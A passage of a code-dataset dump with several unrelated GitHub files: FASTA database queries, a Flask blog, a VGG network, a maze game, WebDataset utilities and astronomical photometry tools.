\r\n Returns:\r\n query [list] -- non-aligned query \r\n \"\"\"\r\n\r\n path = ids[0]+\"\"\r\n if id_len == SUPER_ID:\r\n return (\"\", (ids[0],), path)\r\n path += '.'+ids[1]\r\n query = \" AND class_id=?\"\r\n if id_len == CLASS_ID:\r\n return (query, (ids[0],ids[1]), path)\r\n path += '.'+ids[2]\r\n query += \" AND family_id=?\"\r\n if id_len == FAMILY_ID:\r\n return (query, (ids[0],ids[1],ids[2]), path)\r\n path += '.'+ids[3]\r\n query += \" AND subfam_id=?\"\r\n if id_len == SUBFAM_ID:\r\n return (query, (ids[0],ids[1],ids[2],ids[3]), path)\r\n path += '.'+ids[4]\r\n query += \" AND genus_id=?\"\r\n if id_len == GENUS_ID:\r\n return (query, (ids[0],ids[1],ids[2],ids[3],ids[4]), path)\r\n\r\n def get_node(self, node, aligned):\r\n \"\"\"retrieves data for given node and creates output for it\r\n \r\n Arguments:\r\n node {string} -- node which is asked for\r\n aligned {bool} -- true if aligned, false if non-aligned\r\n \r\n Returns:\r\n fetch [bool] -- true if successful, false if not\r\n \"\"\"\r\n\r\n output_path = Path('./out')\r\n ids = node.split('.')\r\n query = \"SELECT * FROM fastas WHERE super_id=?\"\r\n if aligned and len(ids) > 1:\r\n args = self.alignedQuery(ids, len(ids)-1)\r\n column = args[2]\r\n output_path = output_path / (args[3]+\"_mammalia_aligned_fasta.fasta\")\r\n else:\r\n args = self.unalignedQuery(ids, len(ids)-1)\r\n column = SEQUENCE\r\n output_path = output_path / (args[2]+\"_mammalia_fasta.fasta\")\r\n self.cursor.execute(query+args[0], args[1])\r\n return self.writeToFile(output_path, column) \r\n\r\n def get_species(self, species):\r\n \"\"\"retrieves data for given species and creates output for it\r\n \r\n Arguments:\r\n species {string} -- species which is asked for\r\n \r\n Returns:\r\n fetch [bool] -- true if successful, false if not\r\n \"\"\"\r\n\r\n output_path = Path('./out')\r\n query = \"SELECT * FROM fastas WHERE species=?\"\r\n self.cursor.execute(query,(species,))\r\n output_path = output_path / (species+\"_mammalia_fasta.fasta\")\r\n return self.writeToFile(output_path, SEQUENCE)","repo_name":"jvdmosel/FastaDB","sub_path":"src/fastas/fasta_db.py","file_name":"fasta_db.py","file_ext":"py","file_size_in_byte":12603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2266358669","text":"from . import mail\nfrom flask_mail import Message\nfrom .models import Blogpost\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\nfrom flask_login import login_required, current_user\n\nviews = Blueprint('views', __name__)\n@views.route('/', methods=['GET', 'POST'])\n@views.route('/home', methods=['GET', 'POST'])\n@login_required\ndef home():\n\tposts = Blogpost.query.all()\n\tposts.reverse()\n\treturn render_template('home.html', user=current_user, posts=posts)\n\n@views.route('/about')\ndef about():\n\treturn render_template('about.html', user=current_user)\n\n\n@views.route('/contact', methods=['GET', 'POST'])\n@login_required\ndef contact():\n\tif request.method == 'POST':\n\t\tname = current_user.first_name\n\t\temail = current_user.email\n\t\tphone = request.form.get('phone')\n\t\tmessage = request.form.get('message')\n\n\t\tmsg = Message(f'Contact from {name}',\n\t\t\t\t\t\tsender='contact@akramweb.com',\n\t\t\t\t\t\trecipients=['samielomrani73@gmail.com'])\n\t\tmsg.body = f\"\"\"{message}\\n\nemail : {email}\nPhone : {phone}\n\"\"\"\n\t\tmail.send(msg)\n\t\tflash(\"Your message has been sent we will response as soon as we can\", 'info')\n\t\treturn redirect(url_for('views.home'))\n\treturn render_template('contact.html', user=current_user)","repo_name":"Krim-dev/Flask-Blog","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11011024051","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nbusiness_ownership = db.Table('business_ownership',\n db.Column('user_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),\n db.Column('business_id', db.Integer, db.ForeignKey('business.id'), primary_key=True)\n)\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique=False, nullable=False)\n email = db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n houses = db.relationship('House', backref=\"user\", lazy=True)\n businesses = db.relationship('Business', secondary=business_ownership, back_populates=\"owners\", lazy=True)\n\n\n def __repr__(self):\n return '' % self.username\n\n def serialize(self):\n user_houses = [product.serialize() for product in self.houses]\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"email\": self.email,\n \"houses\": user_houses,\n }\n\nclass House(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n city = db.Column(db.String(120), unique=True, nullable=False)\n house_number = db.Column(db.Integer, unique=False, nullable=False)\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n\n def __repr__(self):\n return '' % self.house_number\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"city\": self.city,\n \"house_number\": self.house_number,\n \"owner_id\": self.owner_id,\n }\n\nclass Business(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n description = db.Column(db.String(120), unique=True, nullable=False)\n owners = db.relationship('User', secondary=business_ownership, back_populates=\"businesses\", lazy=True)\n\n def __repr__(self):\n return '' % self.name\n\n def serialize(self):\n business_owners = [owner.serialize() for owner in self.owners]\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"owners\": business_owners,\n }\n","repo_name":"sergioadll/mini-final-project","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74213034089","text":"def prime_checker(number):\r\n devided_count=0\r\n for no in range(2,round(number/2)+1):\r\n if number % no == 0 :\r\n devided_count+=1\r\n\r\n if devided_count!=0 :\r\n print(f\"{number} isn't a prime number\")\r\n else :\r\n print(f\"{number} is a prime number\")\r\n \r\nn = int(input(\"Check this number: \"))\r\nprime_checker(number=n)\r\n\r\n\r\n\r\n","repo_name":"MaleeshaMadhuhansani99/Python100DayCording","sub_path":"Day08_PrimeNumber_Checker.py","file_name":"Day08_PrimeNumber_Checker.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30887280719","text":"import os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nimport pygame\n\n# Initialize pygame mixer for playing background music\npygame.mixer.init()\n\n\ndef custom_sort_key(filename):\n parts = filename.split(\"_\") # Split the filename into parts using underscores\n second_part = parts[1] # Get the second part of the filename\n third_part = parts[2].split(\".\")[\n 0\n ] # Get the third part (remove the file extension)\n return int(second_part), int(third_part)\n\n\nclass VisualNovelApp:\n def __init__(self, root, image_directory):\n self.root = root\n self.root.title(\"Visual Novel\")\n self.image_directory = image_directory\n print(os.listdir(self.image_directory))\n # Get a list of image files in the specified directory\n self.image_files = sorted(\n [\n f\n for f in os.listdir(image_directory)\n if f.lower().endswith((\".png\", \".jpg\", \".jpeg\", \".gif\"))\n ],\n key=custom_sort_key,\n )\n self.current_image_index = 0\n\n # Load and display the first image\n self.load_image()\n\n # Load and play background music\n pygame.mixer.music.load(\"mixkit-hazy-after-hours-132.mp3\")\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1) # Loop infinitely\n\n # Create navigation buttons\n self.prev_button = ttk.Button(\n root, text=\"Previous\", style=\"NavButton.TButton\", command=self.prev_image\n )\n self.prev_button.pack(side=tk.LEFT, padx=10)\n self.next_button = ttk.Button(\n root, text=\"Next\", style=\"NavButton.TButton\", command=self.next_image\n )\n self.next_button.pack(side=tk.RIGHT, padx=10)\n\n # Bind arrow keys for navigation\n self.root.bind(\"\", self.prev_image)\n self.root.bind(\"\", self.next_image)\n\n # Style for navigation buttons\n style = ttk.Style()\n style.configure(\"NavButton.TButton\", font=(\"Helvetica\", 12), padding=5)\n\n # Bind F11 key to toggle full screen\n self.root.bind(\"\", self.toggle_fullscreen)\n self.root.bind(\"\", self.exit_fullscreen)\n self.fullscreen = False\n\n def load_image(self):\n if self.image_files:\n image_path = os.path.join(\n self.image_directory, self.image_files[self.current_image_index]\n )\n image = Image.open(image_path)\n image.thumbnail(\n (self.root.winfo_screenwidth(), self.root.winfo_screenheight())\n )\n photo = ImageTk.PhotoImage(image)\n\n if hasattr(self, \"image_label\"):\n self.image_label.config(image=photo)\n self.image_label.image = photo\n else:\n self.image_label = ttk.Label(self.root, image=photo)\n self.image_label.pack()\n self.image_label.photo = photo\n\n def prev_image(self, event=None):\n if self.image_files:\n self.current_image_index = (self.current_image_index - 1) % len(\n self.image_files\n )\n self.load_image()\n\n def next_image(self, event=None):\n if self.image_files:\n self.current_image_index = (self.current_image_index + 1) % len(\n self.image_files\n )\n self.load_image()\n\n def toggle_fullscreen(self, event=None):\n self.fullscreen = not self.fullscreen\n self.root.attributes(\"-fullscreen\", self.fullscreen)\n self.load_image()\n\n def exit_fullscreen(self, event=None):\n self.fullscreen = False\n self.root.attributes(\"-fullscreen\", False)\n self.load_image()\n\n\nif __name__ == \"__main__\":\n image_directory = \"VN_Images\"\n root = tk.Tk()\n app = VisualNovelApp(root, image_directory)\n root.mainloop()\n","repo_name":"abhiram1809/VN_Game_Generator","sub_path":"VN_pygame player.py","file_name":"VN_pygame player.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33485468292","text":"from django.db import models\nfrom sites.models import sites\nfrom django.core.validators import MaxLengthValidator\n\n\n# Create your models here.\nclass subjects(models.Model):\n site = models.ForeignKey(sites, on_delete=models.CASCADE)\n name = models.CharField(max_length=64,\n blank=False,\n null=False)\n row_id = models.IntegerField(null=True, blank=True)\n row_prefix = models.CharField(max_length=64, null=True, blank=True)\n\n","repo_name":"Bombozaur666/gallery_app","sub_path":"src/subjects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41189606767","text":"import torch.nn as nn\n\nLAYERS_INFO = {\n 'A': [[1, 1, 2, 2, 2], []],\n 'B': [[2, 2, 2, 2, 2], []],\n 'C': [[2, 2, 3, 3, 3], ['3_3', '4_3', '5_3']],\n 'D': [[2, 2, 3, 3, 3], []],\n 'E': [[2, 2, 4, 4, 4], []]\n }\n\ndef conv_block(in_f, out_f, *args, **kwargs):\n return nn.Sequential(\n nn.Conv2d(in_f, out_f, *args, **kwargs),\n nn.BatchNorm2d(out_f),\n nn.ReLU()\n )\n\ndef conv_layer(block_info):\n block_list = [conv_block(in_f, out_f, kernel_size=k, padding=p)\n for in_f, out_f, k, p in block_info]\n block_list.append(nn.MaxPool2d(2, stride=2))\n return nn.Sequential(*block_list)\n\nclass VGGNet(nn.Module):\n \n def __init__(self, config='A', num_classes=1000, img_size=224):\n super(VGGNet, self).__init__()\n self.config = config\n self.num_classes = num_classes\n self.layer_info = LAYERS_INFO[self.config]\n \n block_infos = self.get_block_infos()\n self.encoder = nn.Sequential(*[conv_layer(block_info) for block_info in block_infos])\n\n self.decoder = nn.Sequential(\n nn.Linear((img_size // 32) * (img_size // 32) * 512, 4096),\n nn.ReLU(),\n nn.Dropout(p=0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Dropout(p=0.5),\n nn.Linear(4096, self.num_classes))\n\n self.initialize_weights()\n \n def get_block_infos(self):\n enc_sizes = [3, 64, 128, 256, 512, 512]\n \n block_infos = list()\n for l_idx, cnt in enumerate(self.layer_info[0]):\n block_info = list()\n for c_idx in range(cnt):\n in_f, out_f = l_idx + int(bool(c_idx)), l_idx + 1\n if f'{l_idx+1}_{c_idx+1}' in self.layer_info[1]:\n block_info.append((enc_sizes[in_f], enc_sizes[out_f], 1, 0))\n else:\n block_info.append((enc_sizes[in_f], enc_sizes[out_f], 3, 1))\n block_infos.append(block_info)\n \n return block_infos\n \n def initialize_weights(self):\n for m in self.modules():\n # convolution kernel의 weight를 He initialization을 적용한다.\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight, mean=0, std=0.1)\n \n # bias는 상수 0으로 초기화 한다.\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.Linear):\n nn.init.kaiming_uniform_(m.weight)\n nn.init.constant_(m.bias, 0) \n \n def forward(self, inputs):\n out = self.encoder(inputs)\n out = out.view(out.size(0), -1)\n out = self.decoder(out)\n return out","repo_name":"RyuDongIl/PyTorch-Model-Study","sub_path":"VGGNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74789824807","text":"import sys\nfrom itertools import combinations\ninput = lambda: sys.stdin.readline().rstrip()\nvowels = ['a', 'e', 'i', 'o', 'u']\nl, c = map(int, input().split())\na = input().split()\na.sort()\n\ncomb = list(combinations(a, l))\n\nfor c in comb:\n count = 0\n for x in c:\n if x in vowels:\n count += 1\n \n if 1 <= count <= l-2:\n print(''.join(c))","repo_name":"deltaori0/Python-Algorithm","sub_path":"baekjoon/브루트포스/1759.py","file_name":"1759.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26503694341","text":"import tkinter\nimport tkinter as Tk\nfrom tracemalloc import start\nimport maze_maker as mm\n\ndef key_down(event): #キーを押した時の処理\n global key\n key = event.keysym\n\ndef key_up(): #キーを離したときの処理\n global key\n key = \"\"\n\ndef main_proc(): #こうかとんのコントロール関数\n global cx, cy,mx,my\n delta = { #押されているキーkey/値:移動幅リスト[x,y]\n \"\" :[0,0],\n \"Up\" :[0, -1],\n \"Down\" :[0, +1],\n \"Left\" :[-1, 0],\n \"Right\" :[+1,0],\n \n }\n try:\n if maze_bg[my+delta[key][1]][mx+delta[key][0]] == 0: #床:0であったら移動可能\n my,mx = my+delta[key][1],mx+delta[key][0]\n except:\n pass\n cx,cy = 100*mx+50,100*my+50 #1マスごとに移動\n canvas.coords(\"tori\", cx, cy)\n root.after(150, main_proc) #150msで移動\n\nif __name__ == \"__main__\":\n root = tkinter.Tk()\n root.title(\"迷えるこうかとん\")\n\n canvas = Tk.Canvas(root,width=1500,height=900,bg=\"black\")\n canvas.pack()\n maze_bg = mm.make_maze(15,9) #1:壁/0:床を生成する\n mm.show_maze(canvas,maze_bg)\n\n tori = Tk.PhotoImage(file = \"fig/7.png\") #こうかとんをNo.7に変更\n mx,my = 1,1 #初期位置指定\n cx,cy = 100*mx+50,100*my+50\n canvas.create_image(cx,cy,image=tori,tag=\"tori\")\n\n goal = Tk.PhotoImage(file = \"fig/goal_tape.png\") #ゴールを設定\n canvas.create_image(1350,750,image=goal,tag=\"goal\")\n\n Start = Tk.PhotoImage(file = \"fig/text_start.png\") #スタートを設定\n canvas.create_image(cx,cy,image=Start,tag=\"Start\")\n\n\n key = \"\"\n\n main_proc()\n \n root.bind(\"\",key_down)\n root.bind(\"\",key_up)\n root.mainloop()","repo_name":"mattha-082111/ProjExD","sub_path":"ex03/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71248421609","text":"import logging\nimport random\nimport sys\nfrom dataclasses import dataclass\nfrom multiprocessing import Value\nimport time\nimport webdataset as wds\nfrom PIL import Image\nfrom torch.utils.data import DataLoader, IterableDataset, get_worker_info\nfrom torch.utils.data.distributed import DistributedSampler\nfrom webdataset.tariterators import (\n base_plus_ext,\n tar_file_expander,\n url_opener,\n valid_sample,\n)\n\nImage.MAX_IMAGE_PIXELS = 1000000000\nLAION2B_NUM_SAMPLE = 1500000000\nVQAV2_TRAIN_NUM_SAMPLE = 1828467\nVG_RELATION_BBOX_SIZE = 600\n\n\nclass SharedEpoch:\n def __init__(self, epoch: int = 0):\n self.shared_epoch = Value(\"i\", epoch)\n\n def set_value(self, epoch):\n self.shared_epoch.value = epoch\n\n def get_value(self):\n return self.shared_epoch.value\n\n\n@dataclass\nclass DataInfo:\n dataloader: DataLoader\n sampler: DistributedSampler = None\n shared_epoch: SharedEpoch = None\n\n def set_epoch(self, epoch):\n if self.shared_epoch is not None:\n self.shared_epoch.set_value(epoch)\n if self.sampler is not None and isinstance(self.sampler, DistributedSampler):\n self.sampler.set_epoch(epoch)\n\n\ndef filter_no_caption_or_no_image(sample):\n return (\"txt\" in sample) and (\n \"png\" in sample or \"jpg\" in sample or \"jpeg\" in sample\n )\n\n\ndef log_and_continue(exn):\n \"\"\"Call in an exception handler to ignore any exception, issue a warning, and continue.\"\"\"\n # if \"ValueError\" in repr(exn) or \"KeyError\" in repr(exn): # Avoid spamming logs with these\n # return True\n logging.info(f\"Handling webdataset error ({repr(exn)}). Ignoring.\")\n return True\n\n\ndef group_by_keys_nothrow(\n data, keys=base_plus_ext, lcase=True, suffixes=None, handler=None\n):\n \"\"\"Return function over iterator that groups key, value pairs into samples.\n\n :param keys: function that splits the key into key and extension (base_plus_ext)\n :param lcase: convert suffixes to lower case (Default value = True)\n \"\"\"\n current_sample = None\n for filesample in data:\n assert isinstance(filesample, dict)\n fname, value = filesample[\"fname\"], filesample[\"data\"]\n prefix, suffix = keys(fname)\n if prefix is None:\n continue\n if lcase:\n suffix = suffix.lower()\n # FIXME webdataset version throws if suffix in current_sample, but we have a potential for\n # this happening in the current LAION400m dataset if a tar ends with same prefix as the next\n # begins, rare, but can happen since prefix aren't unique across tar files in that dataset\n if (\n current_sample is None\n or prefix != current_sample[\"__key__\"]\n or suffix in current_sample\n ):\n if valid_sample(current_sample):\n yield current_sample\n current_sample = dict(__key__=prefix, __url__=filesample[\"__url__\"])\n if suffixes is None or suffix in suffixes:\n current_sample[suffix] = value\n if valid_sample(current_sample):\n yield current_sample\n\n\ndef tarfile_to_samples_nothrow(src, handler=log_and_continue):\n # NOTE this is a re-impl of the webdataset impl with group_by_keys that doesn't throw\n streams = url_opener(src, handler=handler)\n files = tar_file_expander(streams, handler=handler)\n samples = group_by_keys_nothrow(files, handler=handler)\n return samples\n\n\ndef pytorch_worker_seed(increment=0):\n \"\"\"get dataloader worker seed from pytorch\"\"\"\n worker_info = get_worker_info()\n if worker_info is not None:\n # favour using the seed already created for pytorch dataloader workers if it exists\n seed = worker_info.seed\n if increment:\n # space out seed increments so they can't overlap across workers in different iterations\n seed += increment * max(1, worker_info.num_workers)\n return seed\n # fallback to wds rank based seed\n return wds.utils.pytorch_worker_seed()\n\n\n_SHARD_SHUFFLE_SIZE = 2000\n_SHARD_SHUFFLE_INITIAL = 500\n_SAMPLE_SHUFFLE_SIZE = 5000\n_SAMPLE_SHUFFLE_INITIAL = 1000\n\n\nclass ResampledShards2(IterableDataset):\n \"\"\"An iterable dataset yielding a list of urls.\"\"\"\n\n def __init__(\n self,\n urls,\n nshards=sys.maxsize,\n worker_seed=None,\n deterministic=False,\n epoch=-1,\n ):\n \"\"\"Sample shards from the shard list with replacement.\n :param urls: a list of URLs as a Python list or brace notation string\n \"\"\"\n super().__init__()\n urls = wds.shardlists.expand_urls(urls)\n self.urls = urls\n assert isinstance(self.urls[0], str)\n self.nshards = nshards\n self.rng = random.Random()\n self.worker_seed = worker_seed\n self.deterministic = deterministic\n self.epoch = epoch\n\n def __iter__(self):\n \"\"\"Return an iterator over the shards.\"\"\"\n if isinstance(self.epoch, SharedEpoch):\n epoch = self.epoch.get_value()\n else:\n # NOTE: this is epoch tracking is problematic in a multiprocess (dataloader workers or train)\n # situation as different workers may wrap at different times (or not at all).\n self.epoch += 1\n epoch = self.epoch\n\n if self.deterministic:\n # reset seed w/ epoch if deterministic\n if self.worker_seed is None:\n # pytorch worker seed should be deterministic due to being init by arg.seed + rank + worker id\n seed = pytorch_worker_seed(epoch)\n else:\n seed = self.worker_seed() + epoch\n seed = seed + int(time.time())\n self.rng.seed(seed)\n # logging.info(f\"epoch: {epoch} seed: {seed}\")\n self.rng.shuffle(self.urls)\n # logging.info(f\"{len(self.urls)} | {self.urls[:2]}\")\n for url in self.urls:\n # logging.info(f\"{seed}: {url}\")\n yield dict(url=url)\n","repo_name":"UMass-Foundation-Model/CoVLM","sub_path":"open_flamingo/train/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"29620245055","text":"#Tools to help with extraction of photometry\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nfrom photutils.centroids import centroid_com\nfrom photutils import aperture_photometry, SkyCircularAperture, SkyCircularAnnulus\nfrom photutils.utils import calc_total_error\nfrom astropy.table import Table\nfrom astropy.time import Time\n\ndef generate_regions(hdu, approx_location, centering_width = 80, ap_rad = 6.5, in_rad = 7.0, out_rad = 14.0):\n \"\"\"\n Generates source and background regions for aperture photometry. \n Given an image and the approximate RA/Dec of the source, finds the \n centroid within centering_width pixels and generates regions with \n the given parameters\n \n Parameters\n ----------\n hdu : `~astropy.io.fits.hdu.image.PrimaryHDU`\n HDU object containing the FITS image from which regions are generated.\n Should be just the primary hdu (e.g., hdu[0]).\n approx_location : `~astropy.coordinates.SkyCoord`\n `astropy.coordinates.SkyCoord` with the RA and Dec of the object you \n want to generate a region for.\n centering_width : int, optional\n Size of box around source region to find the centroid of in pixels.\n ap_rad : float, optional\n Radius of source region in arcseconds.\n in_rad : float, optional\n Inner radius of background annulus in arcseconds\n out_rad : float, optional\n Outer radius of background annulus in arcseconds\n \n \n Returns\n -------\n src : `~photutils.SkyCircularAperture`\n Aperture object for source\n bkg : `~photutils.SkyCircularAnnulus`\n Aperture object for background\n \n \"\"\"\n \n #Make data and wcs objects\n data = hdu.data\n wcs = WCS(hdu)\n \n #Make the right shape array of coordinates\n world_loc = np.array([[approx_location.ra.value,approx_location.dec.value]])\n \n #Convert to pixel coordinates from the FITS image, 0 indexed b.c. we're working with\n #a numpy array\n approx_pix = wcs.wcs_world2pix(world_loc,0)[0]\n \n #Convert to pixel locations of the window.\n min_x = int(approx_pix[0] - centering_width/2.0)\n min_y = int(approx_pix[1] - centering_width/2.0)\n max_x = int(approx_pix[0] + centering_width/2.0)\n max_y = int(approx_pix[1] + centering_width/2.0)\n \n #Make a little cutout around the object\n #Numpy arrays are weird, so x->y, y->x\n stamp = data[min_y:max_y,min_x:max_x]\n \n #Calculate the centroid of the stamp\n x_stamp_centroid, y_stamp_centroid = centroid_com(stamp)\n \n #Add back in the boundaries of the box to get centroid in data coords\n x_centroid = x_stamp_centroid + min_x\n y_centroid = y_stamp_centroid + min_y\n \n #Convert back to RA/Dec. Remember, these are 0-indexed pixels.\n centroid = wcs.wcs_pix2world(np.array([[x_centroid,y_centroid]]),0)\n \n #Convert centroid to SkyCoords object\n location = SkyCoord(ra = centroid[0,0] * u.degree, dec = centroid[0,1] * u.degree)\n \n #Generate regions based on coordinates and given radii.\n src = SkyCircularAperture(location, r=ap_rad * u.arcsecond)\n bkg = SkyCircularAnnulus(location, r_in=in_rad * u.arcsecond, r_out=out_rad * u.arcsecond)\n \n return src,bkg\n\ndef extract_photometry(filename, approx_location, centering_width = 80, ap_rad = 7.0, in_rad = 8.0, out_rad = 15.0):\n \"\"\"\n Does aperture photometry on the reduced image in filename, at the location \n specified by approx_location\n \n Parameters\n ----------\n filename : str\n Name of the reduced image.\n approx_location : `~astropy.coordinates.SkyCoord`\n `astropy.coordinates.SkyCoord` with the RA and Dec of the object you \n want to extract. Passed to generate_regions.\n centering_width : int, optional\n Size of box around source region to find the centroid of in pixels. \n Passed to generate_regions.\n ap_rad : float, optional\n Radius of source region in arcseconds. Passed to generate_regions.\n in_rad : float, optional\n Inner radius of background annulus in arcseconds. Passed to generate_regions.\n out_rad : float, optional\n Outer radius of background annulus in arcseconds. Passed to generate_regions.\n \n \n Returns\n -------\n phot_table : `~astropy.table.Table`\n A table containing the photometry information. This is the original filename, \n the time of the start of the observation, the exposure time, the time associated \n with the data point, the filter, the center of the extraction region, the radius \n of the source region, the area of the source region in pixels, the source counts, \n the source count error, the center of the background region, the inner radius of \n the background region, the outer radius of the background region, the area of the \n background region, the background counts, the background count error, then the net\n counts, net count error, and the instrumental magnitude and instrumental magnitude\n error.\n \n \"\"\"\n #Open up the file\n hdu = fits.open(filename)[0]\n \n #Let's do some bookkeeping\n #Get the TAI time from the header, convert to an astropy.time.Time object\n time_header = hdu.header['DATE-OBS']\n obs_time_obj = Time(time_header, scale = 'tai')\n #Get the actual value of the MJD out of the astropy object\n obs_time = obs_time_obj.mjd\n \n exp_time = hdu.header['EXPTIME'] * u.second\n time_obj = obs_time_obj + (exp_time/2.0)\n #Get the value of the MJD out of the astropy object again.\n time = time_obj.mjd\n \n #Get the name of the filter\n filt = hdu.header['FILTER']\n \n #Now for some actual photometry\n #Give me the data!\n data = hdu.data\n \n #Major source of error in the image assumed to be readout noise and photon shot noise.\n #The latter is handled by calc_total_error. The former is just an array the same size\n #as the data, filled with the read out noise.\n ron = hdu.header['GTRON11']\n error_arr = np.full(data.shape,ron)\n #Calculate the total error array from the data + gain (Poisson noise) and readout noise.\n gain = hdu.header['GTGAIN11']\n error = calc_total_error(data,error_arr,gain)\n \n #Generate source regions\n src,bkg = generate_regions(hdu,approx_location, centering_width, \n ap_rad, in_rad, out_rad)\n #grab centers of source and background regions\n src_center = (src.positions.ra.value,src.positions.dec.value)\n bkg_center = (bkg.positions.ra.value,bkg.positions.dec.value)\n \n apers = [src,bkg]\n \n #Do some aperture photometry!\n phot_table = aperture_photometry(hdu, apers, error=error)\n \n #Calculate grab counts\n src_cts = phot_table['aperture_sum_0'].data[0]\n src_cts_err = phot_table['aperture_sum_err_0'].data[0]\n \n bkg_cts = phot_table['aperture_sum_1'].data[0]\n bkg_cts_err = phot_table['aperture_sum_err_1'].data[0]\n \n #We need source and background region areas, convert sky regions to pix regions\n wcs = WCS(hdu)\n src_pix = src.to_pixel(wcs)\n bkg_pix = bkg.to_pixel(wcs)\n \n #Calculate region areas\n src_area = src_pix.area()\n bkg_area = bkg_pix.area()\n \n #Scale the background counts\n bkg_scaled = bkg_cts * (src_area / bkg_area)\n bkg_scaled_err = bkg_cts_err * (src_area / bkg_area)\n \n #Net flux = Source - Bkg\n net_cts = src_cts - bkg_scaled\n net_cts_err = np.sqrt(src_cts_err**2.0 + bkg_scaled_err**2.0)\n \n inst_mag = -2.5*np.log10(net_cts/exp_time.value)\n inst_mag_err = 2.5 * net_cts_err / (net_cts*np.log(10.0))\n \n if type(bkg_area[0]) == float:\n \n print(type(bkg_area))\n out_table = Table([[filename],[obs_time],[exp_time.value],[time],[filt],[src_center],[ap_rad],\n [src_area],[src_cts],[src_cts_err],[bkg_center],[in_rad],[out_rad],\n [bkg_area],[bkg_cts],[bkg_cts_err],[net_cts[0]],[net_cts_err[0]],\n [inst_mag[0]],[inst_mag_err[0]]],\n names = ['Filename','Obs_start','Exptime','Time','Filter','Src_center',\n 'Src_rad','Src_area','Src_cts','Src_cts_err','Bkg_center','Bkg_in_rad',\n 'Bkg_out_rad','Bkg_area','Bkg_cts','Bkg_cts_err','Net_cts','Net_cts_err',\n 'Inst_mag','Inst_mag_err'])\n return out_table\n \n out_table = Table([[filename],[obs_time],[exp_time.value],[time],[filt],[src_center],[ap_rad],\n [src_area],[src_cts],[src_cts_err],[bkg_center],[in_rad],[out_rad],\n [bkg_area[0]],[bkg_cts],[bkg_cts_err],[net_cts[0]],[net_cts_err[0]],\n [inst_mag[0]],[inst_mag_err[0]]],\n names = ['Filename','Obs_start','Exptime','Time','Filter','Src_center',\n 'Src_rad','Src_area','Src_cts','Src_cts_err','Bkg_center','Bkg_in_rad',\n 'Bkg_out_rad','Bkg_area','Bkg_cts','Bkg_cts_err','Net_cts','Net_cts_err',\n 'Inst_mag','Inst_mag_err'])\n \n print(type(bkg_area))\n \n return out_table\n","repo_name":"tzdwi/adapt","sub_path":"phot_tools.py","file_name":"phot_tools.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5653230066","text":"#importer les modules\nfrom django.test import TestCase\nfrom .models import Message_wolof\n\n#Creation des cas de testes \nclass Test_data(TestCase):\n #Une fonction permettant de faire des testes sur les modeles\n def test_message_wolof(self):\n messages = Message_wolof()\n messages.message = \"On effectue les testes\"\n messages.emotion = \"Positive\"\n\n self.assertEqual( messages.message, \"On effectue les testes\")\n self.assertEqual( messages.emotion, \"Positive\")","repo_name":"Dar-rius/Wolof_IA","sub_path":"message_wolof/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"fr","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"36899428034","text":"#!/usr/bin/env python3\n\ntables = {\n 'FILM_GENERAL': {\n 'id': 'FILM_ID',\n 'Description': 'FILM_DESC',\n 'Name': 'FILM_NAME'\n },\n 'FILM_CREW': {\n 'id': 'FILM_ID',\n 'Star': 'FILM_STAR',\n 'Rating': 'FILM_RATING',\n 'Director': 'FILM_DIRECTOR',\n 'Writer': 'FILM_WRITER'\n },\n 'FILM_ML': {\n 'id': 'FILM_ID',\n 